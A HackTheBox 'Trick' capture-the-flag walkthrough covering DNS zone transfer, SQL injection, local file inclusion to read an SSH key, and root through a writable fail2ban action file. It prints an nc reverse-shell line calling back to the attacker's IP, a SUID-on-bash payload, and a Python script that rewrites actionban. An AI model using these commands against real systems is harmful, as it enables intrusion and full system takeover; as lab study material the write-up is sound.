# HackTheBox - Trick
## NMAP
```bash
Nmap scan report for 10.129.85.201
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
The web page is a stock Bootstrap "Coming Soon" template with nothing interesting on it.
Fuzzing for files and directories didn't turn up anything either.
## PORT 53 (DNS)
With a DNS server running we can try to query records or attempt a zone transfer, but for that we need a domain name. A reverse lookup of the target IP (its PTR record) resolves the IP to a hostname:
https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
`dig -x 10.10.11.166 @10.10.11.166`
This returns `trick.htb`, which we add to `/etc/hosts`.
The same answer also mentions `root.trick.htb`, but that is the responsible-mailbox field of the zone's SOA record rather than a host, so it doesn't take us anywhere. To enumerate further we request a zone transfer with `dig axfr trick.htb @10.10.11.166`, which the server allows.
The transfer gives another name, `preprod-payroll.trick.htb`, so we add that to the hosts file as well.
Visiting this subdomain gives a login page, where we first try default credentials.
They didn't work, so next I tried SQL injection in the login form.
That worked, so I ran `sqlmap` against it, but the only technique it found was time-based blind, so dumping data this way would take a very long time.
## Foothold
Back on the site there is a GET parameter `page` that loads the individual pages. I tried LFI on that parameter, but it didn't work.
I also ran `wfuzz` against the parameter with an LFI wordlist,
which found nothing. The web app has SQL injection in many places, though: intercepting the request made when viewing an employee's details shows a GET parameter `id` that is also injectable.
Here `sqlmap` identifies boolean-based blind injection, which is far faster than the time-based injection on the login page. With a boolean oracle we can read files through the database (MySQL's `LOAD_FILE()`, which requires the DB user to hold the FILE privilege and `secure_file_priv` not to restrict the path), and the first target is the nginx vhost configuration.
The configuration reveals another vhost, `preprod-marketing.trick.htb`.
Alternatively the subdomain can be found by fuzzing the `Host` header with `wfuzz`.
This loads another site with nothing special apart from the same `page` GET parameter, so I ran the LFI wordlist here as well.
Filtering the responses by size, some payloads start returning file contents.
The readable files give us the username `michael`, so we try his `.ssh` folder for an `id_rsa` private key, which would let us log in over SSH as michael.
## Privilege Escalation
Running `sudo -l` shows what we are allowed to run with sudo: restarting the `fail2ban` service.
Being able to restart `fail2ban` is only useful if we can also change what it runs, and it isn't obvious yet what to edit. michael is a member of the `security` group, though, so we check which files and directories that group has permissions on.
The group has write access to `/etc/fail2ban/action.d`, the folder holding fail2ban's action configuration files.
I found an article explaining how a writable fail2ban configuration can be abused:
https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
The `actionban` command in `iptables-multiport.conf` is executed as root every time fail2ban bans an address. Since the file itself isn't writable but the directory is, we copy it to `/tmp` (or another writable location), replace the `actionban` command with a reverse shell, and put the edited copy back in place:
```bash
# new actionban command: fail2ban runs this as root on every ban
/usr/bin/nc 10.10.14.39 2222 -e /bin/bash
```
After editing the config file, move it back into the `action.d` folder and restart the fail2ban service using the sudo rule.
Then generate failed SSH login attempts; on the 5th failure the ban fires and the reverse shell connects back to your listener.
The shell dies almost immediately, though: the jail bans the host after the 5th attempt but the ban lasts only 10 seconds, and the connection doesn't survive it.
Rather than relying on a reverse shell, use an `actionban` command that leaves a persistent side effect, such as `chmod +s /bin/bash` to set the SUID bit on bash.
Repeat the invalid SSH login attempts; the 5th one triggers the ban and runs the command as root, after which `bash -p` gives a root shell (the `-p` flag stops bash from dropping the effective uid).
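The privilege escalation comes down to rewriting one option in an INI-style action file and confirming that the root-level side effect landed. The script below is an added example for this writeup, not code from the box or the original author. It assumes the action file follows fail2ban's format with `<tag>` placeholders and indented continuation lines, as `iptables-multiport.conf` does; the config excerpt is constructed, not copied from the target, and `has_suid` is the check you would run after the 5th failed login.

```python
"""Patch the actionban command of a fail2ban action file and verify the result.

Added example for this writeup, not code from the box or the original author.
Assumes the action file uses fail2ban's INI format with `<tag>` placeholders,
as /etc/fail2ban/action.d/iptables-multiport.conf does; the excerpt below is
constructed, not copied from the target.
"""
import os
import re
import stat
from pathlib import Path

# Constructed excerpt in the layout of iptables-multiport.conf. Continuation
# lines of a value are indented, so an option such as actionban may span
# several lines.
ORIGINAL_ACTION = """[Definition]
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>

[Init]
chain = INPUT
"""

# The actionban option: its first line plus any indented continuation lines.
_ACTIONBAN_RE = re.compile(r"^actionban[ \t]*=.*(?:\n[ \t]+.*)*", re.MULTILINE)


def patch_actionban(text: str, command: str) -> str:
    """Replace the whole actionban value with `command` (which fail2ban runs as
    root on every ban). Raises if the file has no actionban option."""
    if not _ACTIONBAN_RE.search(text):
        raise ValueError("no actionban option in action file")
    # Lambda replacement so backslashes in `command` are not read as group refs.
    return _ACTIONBAN_RE.sub(lambda _m: f"actionban = {command}", text, count=1)


def get_actionban(text: str) -> str:
    """Current actionban value, with continuation lines joined by a space."""
    m = _ACTIONBAN_RE.search(text)
    if not m:
        return ""
    value = m.group(0).split("=", 1)[1]
    return " ".join(part.strip() for part in value.splitlines())


def patch_file(src: Path, dst: Path, command: str) -> None:
    """Copy-and-patch, mirroring the copy-to-/tmp, edit, move-back workflow."""
    dst.write_text(patch_actionban(src.read_text(), command))


def has_suid(path: str) -> bool:
    """Check the persistent side effect: did the ban set the SUID bit?"""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


if __name__ == "__main__":
    patched = patch_actionban(ORIGINAL_ACTION, "chmod +s /bin/bash")
    print(patched)
    print("SUID on /bin/bash:", has_suid("/bin/bash"))
```

`patch_file(Path("/etc/fail2ban/action.d/iptables-multiport.conf"), Path("/tmp/iptables-multiport.conf"), "chmod +s /bin/bash")` produces the edited copy; moving it back, restarting the service with the sudo rule and triggering five failed SSH logins are still done by hand, and `has_suid("/bin/bash")` tells you whether the ban actually ran the command before you try `bash -p`.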
## References
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
- https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7